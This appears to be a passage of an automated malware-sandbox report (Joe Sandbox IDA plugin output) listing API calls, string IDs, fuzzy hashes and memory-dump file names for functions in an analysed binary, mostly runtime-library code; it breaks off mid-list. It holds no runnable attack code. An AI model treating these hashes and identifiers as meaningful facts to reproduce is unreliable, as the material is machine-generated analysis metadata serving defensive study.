                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC710972940A059BDF239F95CC86BAE7BFA9F45310F254055F904AF381E775EC008762
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0033550C
                                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00335538
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00335577
                                                                                                                                                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00335594
                                                                                                                                                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 003355D3
                                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 003355F0
                                                                                                                                                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00335632
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00335655
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2040435927-0
                                                                                                                                                                                                                                                                • Opcode ID: 5151f64e3ed573a0f67f596ea9cc73f31b557ce2dec3e60eefb33283fdec0be5
                                                                                                                                                                                                                                                                • Instruction ID: abfa828a17a3ed6c2dc31e98d8c080111afcd108d7bb9616df99bbcef8d84323
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5151f64e3ed573a0f67f596ea9cc73f31b557ce2dec3e60eefb33283fdec0be5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1051A072600606AFEF229F65CC86FBB7BA9EF40751F564425FD05EA1A0DB30DD108B90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00336217
                                                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 0033621F
                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 003362A8
                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 003362D3
                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00336328
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                • Opcode ID: 2b9f9002a7ea33bdb3bf2997852a297b11b48f8f6039071976e94ddaf8feb0a7
                                                                                                                                                                                                                                                                • Instruction ID: 492a90b17d630f87328ddbe71ff0b32f88068b793d3a1000196be56b45017db4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b9f9002a7ea33bdb3bf2997852a297b11b48f8f6039071976e94ddaf8feb0a7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3418234A00218AFCF12DF68C8C6A9EBBB5EF45324F15C555E8149F3A2D771AA05CB91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,0033F578,0033186A,?,00000000,003331E1,0033186C,?,0033F1F6,00000022,FlsSetValue,0034DFE0,8,5,003331E1), ref: 0033F52A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                • Opcode ID: 066424019a4ae8340af20a1f66eaa4e13afafdfb11067ab9da81d44504a86887
                                                                                                                                                                                                                                                                • Instruction ID: e1b959f2cc2acb5b0f5f4b34274bd437abd872c1cfbe8009d5e8bbd4da27567b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 066424019a4ae8340af20a1f66eaa4e13afafdfb11067ab9da81d44504a86887
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1219372E02311AFDB239B65EC85A5B775C9B427A5F650130FD16AB2A0EB30FE00C6D0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: f860e3d02eb0dfb5b8e39e9fc1b85d506612de9670ea47cbf934196d7d472022
                                                                                                                                                                                                                                                                • Instruction ID: 53dd24b1b9f93867f9708bb4d28659b0ae23d703fc99c2689e0d0c38ff3bf35a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f860e3d02eb0dfb5b8e39e9fc1b85d506612de9670ea47cbf934196d7d472022
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7B11370A04344AFDF13DFA9D892BADBBF8AF46300F154199E5019F3A6C770A941CB62
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,0033D2B7,00335FB7,00335179), ref: 0033D2CE
                                                                                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0033D2DC
                                                                                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0033D2F5
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,0033D2B7,00335FB7,00335179), ref: 0033D347
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                • Opcode ID: e28ec3d1ea4337ece4867767ace7a3d3dcda7d6dccd51a40e47616f87b9f1a2c
                                                                                                                                                                                                                                                                • Instruction ID: 186b87cd0697e6b1b16b52b73caf29cc05af0c13c614d9aec36e534be79e2a01
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e28ec3d1ea4337ece4867767ace7a3d3dcda7d6dccd51a40e47616f87b9f1a2c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D01F23620F7259EE7272B74BCC596B2A9CEB017B6F240329F120A90F0EF15BC4492C1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 0033DCA7
                                                                                                                                                                                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 0033DF20
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                                                • Opcode ID: 1dc41d27470410209cc3a0b2dbf2cbe885760f6c5b61698639a442d10c0721c1
                                                                                                                                                                                                                                                                • Instruction ID: a6e533bf1190751298d5eda33410eb8d3eca719147cf8e1f8006d7c6fd1b58f6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1dc41d27470410209cc3a0b2dbf2cbe885760f6c5b61698639a442d10c0721c1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61B16971800209EFCF2ADFA4E8C19AEBBB5FF14310F15455AE811AF216D771EA61CB91
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00334582
                                                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0033458C
                                                                                                                                                                                                                                                                  • Part of subcall function 003324C2: std::_Lockit::_Lockit.LIBCPMT ref: 003324DE
                                                                                                                                                                                                                                                                  • Part of subcall function 003324C2: std::_Lockit::~_Lockit.LIBCPMT ref: 003324F7
                                                                                                                                                                                                                                                                • codecvt.LIBCPMT ref: 003345C6
                                                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 003345FD
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                                                • String ID: hf5
                                                                                                                                                                                                                                                                • API String ID: 3716348337-3700509576
                                                                                                                                                                                                                                                                • Opcode ID: 679212265b0f81e3c6584279bfab36ffe19e452300f9c3b3da9cd787ddf47b3f
                                                                                                                                                                                                                                                                • Instruction ID: 4d60e1b9acd9c8826087f85ae69875ecba73944f3398a063c8a195f0ff47a95b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 679212265b0f81e3c6584279bfab36ffe19e452300f9c3b3da9cd787ddf47b3f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6101F575900615CBCF07EFA4D8966AEB7B5FF55710F250508F411AF2A1CF74AE018791
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,0034B774,000000FF,?,00338D16,00338BFD,?,00338DB2,00000000), ref: 00338C8A
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,0034B774,000000FF,?,00338D16,00338BFD,?,00338DB2,00000000), ref: 00338C9C
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,0034B774,000000FF,?,00338D16,00338BFD,?,00338DB2,00000000), ref: 00338CBE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                • Opcode ID: a2ebc0f2816eacbf2e43fb1f545e91f16c651129f6f63ac7fa625f05a2a249f4
                                                                                                                                                                                                                                                                • Instruction ID: 7f3b41f7e9c422655e46988e701db1a244716b9d93048e04aa8ef38f9b0fc4db
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a2ebc0f2816eacbf2e43fb1f545e91f16c651129f6f63ac7fa625f05a2a249f4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86016771945755EFDB138B54CC49FEEBBBCFB44B52F000525F811A22E0DB749900CA90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 0033FCC2
                                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 0033FD8B
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 0033FDF2
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E531: HeapAlloc.KERNEL32(00000000,003331E1,0033186A,?,003360C1,0033186C,0033186A,?,?,?,00333181,003331E1,0033186E,0033186A,0033186A,0033186A), ref: 0033E563
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 0033FE05
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 0033FE12
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1096550386-0
                                                                                                                                                                                                                                                                • Opcode ID: 8f74603fb210a249694235cb8867d9ca75d15cdafba1e40b8c59f2f2777e8703
                                                                                                                                                                                                                                                                • Instruction ID: 25080428a21125f59c424ce893c6e0a5bc69529afb6788eddbd93dac9b15c2cc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f74603fb210a249694235cb8867d9ca75d15cdafba1e40b8c59f2f2777e8703
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E451A672900246AFEF22AF62DCC5EBB7AADEF44710F960539FD04DA151EB34DC5096A0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00333017
                                                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00333022
                                                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00333090
                                                                                                                                                                                                                                                                  • Part of subcall function 00332EE4: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00332EFC
                                                                                                                                                                                                                                                                • std::locale::_Setgloballocale.LIBCPMT ref: 0033303D
                                                                                                                                                                                                                                                                • _Yarn.LIBCPMT ref: 00333053
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1088826258-0
                                                                                                                                                                                                                                                                • Opcode ID: 2062838bad451c5e0d9b5c7bf8e62c44c656eca0a02e36797728c0d1e9e94f13
                                                                                                                                                                                                                                                                • Instruction ID: 01f33944cef2dc9be6af8024aa5c5565985df18ff89244a889aed25ca3591d7a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2062838bad451c5e0d9b5c7bf8e62c44c656eca0a02e36797728c0d1e9e94f13
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66018FB6A002249BCB0BEF60D88697D7B75FF85341F154409E8125B3A1DF34AE42CB81
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00347F2E,00000000,?,00356E10,?,?,?,00347E65,00000004,InitializeCriticalSectionEx,0034E57C,0034E584), ref: 00347E9F
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00347F2E,00000000,?,00356E10,?,?,?,00347E65,00000004,InitializeCriticalSectionEx,0034E57C,0034E584,00000000,?,0033E1DC), ref: 00347EA9
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00347ED1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546354157.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                                • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                                • Opcode ID: 3d0dd7108fbec4753c5da21c2366a16f5d270be1a17453f333e4f18fe46ec239
                                                                                                                                                                                                                                                                • Instruction ID: 987a0315bf1dc2fd44ee6a9f40c565b39edb45184c46b2b5de10bc2f7845544a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d0dd7108fbec4753c5da21c2366a16f5d270be1a17453f333e4f18fe46ec239
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1E04870284309B7DB131B61DC06F593B9DDB10B91F104060FE0DBC4F1D761AD9096C4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00345690
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0033FDE8,?,00000000,-00000008), ref: 0033E6A2
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 003458E2
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00345928
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 003459CB
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2546206815.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546179792.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546240321.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546279689.0000000000355000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546298594.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2546329083.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
